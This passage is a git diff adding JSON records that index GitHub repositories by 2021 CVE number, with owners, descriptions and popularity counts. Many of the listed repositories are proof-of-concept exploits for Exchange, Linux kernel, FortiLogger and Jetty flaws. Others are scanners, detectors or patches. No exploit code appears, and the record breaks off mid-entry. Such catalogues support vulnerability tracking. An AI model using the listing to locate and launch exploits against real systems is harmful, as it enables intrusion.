+ "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-33766.json b/2021/CVE-2021-33766.json new file mode 100644 index 0000000000..e036400079 --- /dev/null +++ b/2021/CVE-2021-33766.json @@ -0,0 +1,73 @@ +[ + { + "id": 401854753, + "name": "CVE-2021-33766", + "full_name": "bhdresh\/CVE-2021-33766", + "owner": { + "login": "bhdresh", + "id": 8931885, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8931885?v=4", + "html_url": "https:\/\/github.com\/bhdresh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bhdresh\/CVE-2021-33766", + "description": "ProxyToken (CVE-2021-33766) : An Authentication Bypass in Microsoft Exchange Server POC exploit", + "fork": false, + "created_at": "2021-08-31T22:03:13Z", + "updated_at": "2024-08-12T20:16:03Z", + "pushed_at": "2021-10-14T12:32:11Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-33766", + "exchange", + "exchange-server", + "exploit", + "microsoft", + "poc", + "proxytoken", + "vulnerability" + ], + "visibility": "public", + "forks": 23, + "watchers": 47, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 406689758, + "name": "CVE-2021-33766-ProxyToken", + "full_name": "demossl\/CVE-2021-33766-ProxyToken", + "owner": { + "login": "demossl", + "id": 29975349, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29975349?v=4", + "html_url": "https:\/\/github.com\/demossl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/demossl\/CVE-2021-33766-ProxyToken", + "description": "CVE-2021-33766-poc", + "fork": false, + "created_at": "2021-09-15T09:09:20Z", + "updated_at": "2024-08-12T20:16:27Z", + "pushed_at": "2021-09-15T09:23:39Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3378.json b/2021/CVE-2021-3378.json new file mode 100644 index 0000000000..3593632f44 --- /dev/null +++ b/2021/CVE-2021-3378.json @@ -0,0 +1,33 @@ +[ + { + "id": 334535823, + "name": "fortilogger_arbitrary_fileupload", + "full_name": "erberkan\/fortilogger_arbitrary_fileupload", + "owner": { + "login": "erberkan", + "id": 15521812, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15521812?v=4", + "html_url": "https:\/\/github.com\/erberkan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/erberkan\/fortilogger_arbitrary_fileupload", + "description": "CVE-2021-3378 | FortiLogger - Unauthenticated Arbitrary File Upload (Metasploit)", + "fork": false, + "created_at": "2021-01-30T23:47:14Z", + "updated_at": "2024-08-12T20:09:55Z", + "pushed_at": "2021-02-28T16:29:07Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 22, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-33831.json b/2021/CVE-2021-33831.json new file mode 100644 index 0000000000..8efda85545 --- /dev/null +++ b/2021/CVE-2021-33831.json @@ -0,0 +1,33 @@ +[ + { + "id": 398819708, + "name": "CVE-2021-33831", + "full_name": "lanmarc77\/CVE-2021-33831", + "owner": { + "login": "lanmarc77", + "id": 3054734, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3054734?v=4", + "html_url": "https:\/\/github.com\/lanmarc77", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lanmarc77\/CVE-2021-33831", + "description": "Exploit example code for CVE-2021-33831", + "fork": false, + "created_at": "2021-08-22T14:27:29Z", + "updated_at": "2021-09-01T08:02:36Z", + "pushed_at": "2021-09-01T07:53:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-33879.json b/2021/CVE-2021-33879.json new file mode 100644 index 0000000000..f4edf988fc --- /dev/null +++ b/2021/CVE-2021-33879.json @@ -0,0 +1,40 @@ +[ + { + "id": 374430462, + "name": "cve-2021-33879", + "full_name": "mmiszczyk\/cve-2021-33879", + "owner": { + "login": "mmiszczyk", + "id": 20739931, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20739931?v=4", + "html_url": "https:\/\/github.com\/mmiszczyk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mmiszczyk\/cve-2021-33879", + "description": "GameLoop update MITM", + "fork": false, + "created_at": "2021-06-06T18:05:30Z", + "updated_at": "2021-06-07T07:48:02Z", + "pushed_at": "2021-06-06T18:30:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "advisory", + "android-emulator", + "cve", + "cve-2021-33879", + "exploit", + "security" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-33909.json b/2021/CVE-2021-33909.json new file mode 100644 index 0000000000..27f7e708c0 --- /dev/null +++ b/2021/CVE-2021-33909.json @@ -0,0 +1,126 @@ +[ + { + "id": 387988488, + "name": "CVE-2021-33909", + "full_name": "Liang2580\/CVE-2021-33909", + "owner": { + "login": "Liang2580", + "id": 27684409, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27684409?v=4", + "html_url": "https:\/\/github.com\/Liang2580", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Liang2580\/CVE-2021-33909", + "description": "Sequoia exploit (7\/20\/21)", + "fork": false, + "created_at": "2021-07-21T04:04:49Z", + "updated_at": "2024-08-12T20:14:52Z", + "pushed_at": "2021-07-20T23:04:13Z", + "stargazers_count": 78, + "watchers_count": 78, + "has_discussions": false, + "forks_count": 63, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 63, + "watchers": 78, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 388209239, + "name": "cve-2021-33909", + "full_name": "baerwolf\/cve-2021-33909", + "owner": { + "login": "baerwolf", + "id": 1092625, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1092625?v=4", + "html_url": "https:\/\/github.com\/baerwolf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/baerwolf\/cve-2021-33909", + "description": "This module fixes an issue in the kernels filesystem layer (CVE-2021-33909) by kprobe-replacing vulnerable functions during runtime", + "fork": false, + "created_at": "2021-07-21T18:22:55Z", + "updated_at": "2023-09-08T18:24:32Z", + "pushed_at": "2021-07-25T21:56:30Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 389496562, + "name": "CVE-2021-33909", + "full_name": "bbinfosec43\/CVE-2021-33909", + "owner": { + "login": "bbinfosec43", + "id": 82197936, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82197936?v=4", + "html_url": "https:\/\/github.com\/bbinfosec43", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bbinfosec43\/CVE-2021-33909", + "description": "Exploit code for CVE-2021-33909,Just a dump of removed https:\/\/github.com\/AmIAHuman\/ repo", + "fork": false, + "created_at": "2021-07-26T03:24:35Z", + "updated_at": "2022-07-12T14:51:35Z", + "pushed_at": "2021-07-26T03:29:36Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 402293370, + "name": "CVE-2021-33909", + "full_name": "ChrisTheCoolHut\/CVE-2021-33909", + "owner": { + "login": "ChrisTheCoolHut", + "id": 10480015, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10480015?v=4", + "html_url": "https:\/\/github.com\/ChrisTheCoolHut", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ChrisTheCoolHut\/CVE-2021-33909", + "description": "CVE-2021-33909 Sequoia", + "fork": false, + "created_at": "2021-09-02T04:51:54Z", + "updated_at": "2024-10-27T14:43:42Z", + "pushed_at": "2021-09-02T04:52:19Z", + "stargazers_count": 43, + "watchers_count": 43, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 43, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3395.json b/2021/CVE-2021-3395.json new file mode 100644 index 0000000000..998b91dae5 --- /dev/null +++ b/2021/CVE-2021-3395.json @@ -0,0 +1,33 @@ +[ + { + "id": 335386045, + "name": "CVE-2021-3395", + "full_name": "jet-pentest\/CVE-2021-3395", + "owner": { + "login": "jet-pentest", + "id": 71512502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4", + "html_url": "https:\/\/github.com\/jet-pentest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2021-3395", + "description": null, + "fork": false, + "created_at": "2021-02-02T18:31:35Z", + "updated_at": "2021-02-14T09:24:05Z", + "pushed_at": "2021-02-02T18:38:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-33959.json b/2021/CVE-2021-33959.json new file mode 100644 index 0000000000..46dff53823 --- /dev/null +++ b/2021/CVE-2021-33959.json @@ -0,0 +1,33 @@ +[ + { + "id": 589167245, + "name": "CVE-2021-33959", + "full_name": "lixiang957\/CVE-2021-33959", + "owner": { + "login": "lixiang957", + "id": 34414625, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34414625?v=4", + "html_url": "https:\/\/github.com\/lixiang957", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lixiang957\/CVE-2021-33959", + "description": "CVE-2021-33959", + "fork": false, + "created_at": "2023-01-15T09:47:48Z", + "updated_at": "2023-01-20T07:30:16Z", + "pushed_at": "2023-01-15T09:51:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-34045.json b/2021/CVE-2021-34045.json new file mode 100644 index 0000000000..56fcb33894 --- /dev/null +++ b/2021/CVE-2021-34045.json @@ -0,0 +1,64 @@ +[ + { + "id": 381879818, + "name": "CVE-2021-34045", + "full_name": "Al1ex\/CVE-2021-34045", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2021-34045", + "description": "Novel-plus-install-v3.5.3-Druid Unauthorized access", + "fork": false, + "created_at": "2021-07-01T01:52:49Z", + "updated_at": "2024-08-12T20:14:21Z", + "pushed_at": "2021-07-01T02:07:39Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438706438, + "name": "CVE-2021-34045", + "full_name": "kenuosec\/CVE-2021-34045", + "owner": { + "login": "kenuosec", + "id": 77450225, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77450225?v=4", + "html_url": "https:\/\/github.com\/kenuosec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kenuosec\/CVE-2021-34045", + "description": "druid未授权访问批量扫描poc", + "fork": false, + "created_at": "2021-12-15T16:56:09Z", + "updated_at": "2023-07-25T07:50:05Z", + "pushed_at": "2021-12-15T07:37:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-34371.json b/2021/CVE-2021-34371.json new file mode 100644 index 0000000000..e8084e29c5 --- /dev/null +++ b/2021/CVE-2021-34371.json @@ -0,0 +1,33 @@ +[ + { + "id": 403456341, + "name": "CVE-2021-34371.jar", + "full_name": "zwjjustdoit\/CVE-2021-34371.jar", + "owner": { + "login": "zwjjustdoit", + "id": 50495555, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50495555?v=4", + "html_url": "https:\/\/github.com\/zwjjustdoit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zwjjustdoit\/CVE-2021-34371.jar", + "description": "CVE-2021-34371.jar", + "fork": false, + "created_at": "2021-09-06T02:00:52Z", + "updated_at": "2024-11-28T12:56:16Z", + "pushed_at": "2021-09-06T02:04:15Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 23, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3438.json b/2021/CVE-2021-3438.json new file mode 100644 index 0000000000..1fcf18dc49 --- /dev/null +++ b/2021/CVE-2021-3438.json @@ -0,0 +1,64 @@ +[ + { + "id": 390295076, + "name": "CVE-2021-3438", + "full_name": "TobiasS1402\/CVE-2021-3438", + "owner": { + "login": "TobiasS1402", + "id": 46230851, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46230851?v=4", + "html_url": "https:\/\/github.com\/TobiasS1402", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TobiasS1402\/CVE-2021-3438", + "description": "Detection and remediation for CVE-2021-3438 with Powershell", + "fork": false, + "created_at": "2021-07-28T09:36:42Z", + "updated_at": "2021-07-28T14:51:57Z", + "pushed_at": "2021-07-28T14:41:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 643688534, + "name": "CVE-2021-3438", + "full_name": "CrackerCat\/CVE-2021-3438", + "owner": { + "login": "CrackerCat", + "id": 17995064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4", + "html_url": "https:\/\/github.com\/CrackerCat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CrackerCat\/CVE-2021-3438", + "description": "A potential buffer overflow in the software drivers for certain HP LaserJet products and Samsung product printers could lead to an escalation of privilege.", + "fork": false, + "created_at": "2023-05-22T00:00:34Z", + "updated_at": "2023-07-14T15:06:05Z", + "pushed_at": "2023-05-21T02:58:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3441.json b/2021/CVE-2021-3441.json new file mode 100644 index 0000000000..9b267532b9 --- /dev/null +++ b/2021/CVE-2021-3441.json @@ -0,0 +1,38 @@ +[ + { + "id": 333244615, + "name": "CVE-2021-3441-check", + "full_name": "tcbutler320\/CVE-2021-3441-check", + "owner": { + "login": "tcbutler320", + "id": 41709108, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41709108?v=4", + "html_url": "https:\/\/github.com\/tcbutler320", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tcbutler320\/CVE-2021-3441-check", + "description": "CVE-2021-3441 CVE Check is a python script to search targets for indicators of compromise to CVE-2021-3441", + "fork": false, + "created_at": "2021-01-26T23:23:08Z", + "updated_at": "2021-08-26T02:09:11Z", + "pushed_at": "2021-08-20T09:52:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-scanning", + "indicators-of-compromise", + "ioc" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-34428.json b/2021/CVE-2021-34428.json new file mode 100644 index 0000000000..c37728d35b --- /dev/null +++ b/2021/CVE-2021-34428.json @@ -0,0 +1,33 @@ +[ + { + "id": 712845829, + "name": "jetty_9.4.31_CVE-2021-34428", + "full_name": "Trinadh465\/jetty_9.4.31_CVE-2021-34428", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/jetty_9.4.31_CVE-2021-34428", + "description": null, + "fork": false, + "created_at": "2023-11-01T10:15:36Z", + "updated_at": "2023-11-01T10:17:17Z", + "pushed_at": "2023-11-01T12:01:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-34429.json b/2021/CVE-2021-34429.json new file mode 100644 index 0000000000..570839365d --- /dev/null +++ b/2021/CVE-2021-34429.json @@ -0,0 +1,41 @@ +[ + { + "id": 424157746, + "name": "CVE-2021-34429", + "full_name": "ColdFusionX\/CVE-2021-34429", + "owner": { + "login": "ColdFusionX", + "id": 8522240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8522240?v=4", + "html_url": "https:\/\/github.com\/ColdFusionX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ColdFusionX\/CVE-2021-34429", + "description": "POC for CVE-2021-34429 - Eclipse Jetty 11.0.5 Sensitive File Disclosure", + "fork": false, + "created_at": "2021-11-03T09:13:12Z", + "updated_at": "2024-09-27T11:59:51Z", + "pushed_at": "2021-11-03T11:51:41Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-34429", + "docker", + "eclipse", + "exploit", + "jetty", + "path-traversal", + "web-xml" + ], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-34470.json b/2021/CVE-2021-34470.json new file mode 100644 index 0000000000..57d720bd80 --- /dev/null +++ b/2021/CVE-2021-34470.json @@ -0,0 +1,33 @@ +[ + { + "id": 390877656, + "name": "CVE-2021-34470scanner", + "full_name": "technion\/CVE-2021-34470scanner", + "owner": { + "login": "technion", + "id": 1948596, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1948596?v=4", + "html_url": "https:\/\/github.com\/technion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/technion\/CVE-2021-34470scanner", + "description": "A Powrshell script to scan for CVE-2021-34470", + "fork": false, + "created_at": "2021-07-29T23:50:31Z", + "updated_at": "2022-08-18T06:30:57Z", + "pushed_at": "2021-07-29T23:51:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-34473.json b/2021/CVE-2021-34473.json new file mode 100644 index 0000000000..747efa86b6 --- /dev/null +++ b/2021/CVE-2021-34473.json @@ -0,0 +1,281 @@ +[ + { + "id": 394695294, + "name": "Proxyshell-Scanner", + "full_name": "cyberheartmi9\/Proxyshell-Scanner", + "owner": { + "login": "cyberheartmi9", + "id": 12415756, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12415756?v=4", + "html_url": "https:\/\/github.com\/cyberheartmi9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyberheartmi9\/Proxyshell-Scanner", + "description": "nuclei scanner for proxyshell ( CVE-2021-34473 )", + "fork": false, + "created_at": "2021-08-10T15:01:02Z", + "updated_at": "2024-08-12T20:15:29Z", + "pushed_at": "2022-10-09T20:34:21Z", + "stargazers_count": 42, + "watchers_count": 42, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 42, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 394978827, + "name": "CVE-2021-34473-scanner", + "full_name": "RaouzRouik\/CVE-2021-34473-scanner", + "owner": { + "login": "RaouzRouik", + "id": 69973378, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69973378?v=4", + "html_url": "https:\/\/github.com\/RaouzRouik", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RaouzRouik\/CVE-2021-34473-scanner", + "description": "Scanner for CVE-2021-34473, ProxyShell, A Microsoft Exchange On-premise Vulnerability", + "fork": false, + "created_at": "2021-08-11T12:20:07Z", + "updated_at": "2021-12-22T09:48:36Z", + "pushed_at": "2021-08-11T12:55:36Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 396762986, + "name": "CVE-2021-34473", + "full_name": "p2-98\/CVE-2021-34473", + "owner": { + "login": "p2-98", + "id": 22283229, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22283229?v=4", + "html_url": "https:\/\/github.com\/p2-98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p2-98\/CVE-2021-34473", + "description": "CVE-2021-34473 Microsoft Exchange Server Remote Code Execution Vulnerability", + "fork": false, + "created_at": "2021-08-16T11:27:13Z", + "updated_at": "2024-08-12T20:15:38Z", + "pushed_at": "2021-08-16T09:00:06Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 30, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 403092854, + "name": "proxyshell", + "full_name": "horizon3ai\/proxyshell", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/proxyshell", + "description": "Proof of Concept for CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207", + "fork": false, + "created_at": "2021-09-04T15:34:03Z", + "updated_at": "2024-11-05T06:34:19Z", + "pushed_at": "2023-08-25T22:42:24Z", + "stargazers_count": 109, + "watchers_count": 109, + "has_discussions": false, + "forks_count": 36, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 36, + "watchers": 109, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 430609692, + "name": "CVE-2021-34473-Exchange-ProxyShell", + "full_name": "je6k\/CVE-2021-34473-Exchange-ProxyShell", + "owner": { + "login": "je6k", + "id": 29349902, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29349902?v=4", + "html_url": "https:\/\/github.com\/je6k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/je6k\/CVE-2021-34473-Exchange-ProxyShell", + "description": "对Exchange Proxyshell 做了二次修改,精确的拆分、实现辅助性安全测试。", + "fork": false, + "created_at": "2021-11-22T07:47:09Z", + "updated_at": "2024-08-28T13:16:53Z", + "pushed_at": "2021-11-23T09:56:37Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 495736784, + "name": "ProxyShell-CVE-2021-34473.py", + "full_name": "learningsurface\/ProxyShell-CVE-2021-34473.py", + "owner": { + "login": "learningsurface", + "id": 102359968, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102359968?v=4", + "html_url": "https:\/\/github.com\/learningsurface", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/learningsurface\/ProxyShell-CVE-2021-34473.py", + "description": "A simple script to check for ProxyShell", + "fork": false, + "created_at": "2022-05-24T08:35:15Z", + "updated_at": "2022-04-21T23:00:12Z", + "pushed_at": "2022-01-17T15:19:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 508685161, + "name": "ProxyShell", + "full_name": "kh4sh3i\/ProxyShell", + "owner": { + "login": "kh4sh3i", + "id": 64693844, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64693844?v=4", + "html_url": "https:\/\/github.com\/kh4sh3i", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kh4sh3i\/ProxyShell", + "description": "CVE-2021-34473 Microsoft Exchange Server Remote Code Execution Vulnerability", + "fork": false, + "created_at": "2022-06-29T12:37:31Z", + "updated_at": "2024-10-21T03:33:05Z", + "pushed_at": "2022-06-30T08:36:58Z", + "stargazers_count": 33, + "watchers_count": 33, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 33, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 566698177, + "name": "CVE-2021-34473-NMAP-SCANNER", + "full_name": "ipsBruno\/CVE-2021-34473-NMAP-SCANNER", + "owner": { + "login": "ipsBruno", + "id": 6839604, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6839604?v=4", + "html_url": "https:\/\/github.com\/ipsBruno", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ipsBruno\/CVE-2021-34473-NMAP-SCANNER", + "description": "A massive scanner for CVE-2021-34473 Microsoft Exchange Windows Vulnerability", + "fork": false, + "created_at": "2022-11-16T08:22:29Z", + "updated_at": "2023-05-06T05:33:04Z", + "pushed_at": "2022-11-16T08:36:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 706066499, + "name": "CVE", + "full_name": "f4alireza\/CVE", + "owner": { + "login": "f4alireza", + "id": 87991945, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87991945?v=4", + "html_url": "https:\/\/github.com\/f4alireza", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/f4alireza\/CVE", + "description": "Proxyshell for Exploiting CVE-2021-34473", + "fork": false, + "created_at": "2023-10-17T08:38:08Z", + "updated_at": "2023-10-17T08:40:37Z", + "pushed_at": "2023-10-17T08:40:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-34481.json b/2021/CVE-2021-34481.json new file mode 100644 index 0000000000..5cda25c1e5 --- /dev/null +++ b/2021/CVE-2021-34481.json @@ -0,0 +1,33 @@ +[ + { + "id": 395059295, + "name": "CVE-2021-34481", + "full_name": "vpn28\/CVE-2021-34481", + "owner": { + "login": "vpn28", + "id": 20010038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20010038?v=4", + "html_url": "https:\/\/github.com\/vpn28", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vpn28\/CVE-2021-34481", + "description": "Check patch for CVE-2021-34481", + "fork": false, + 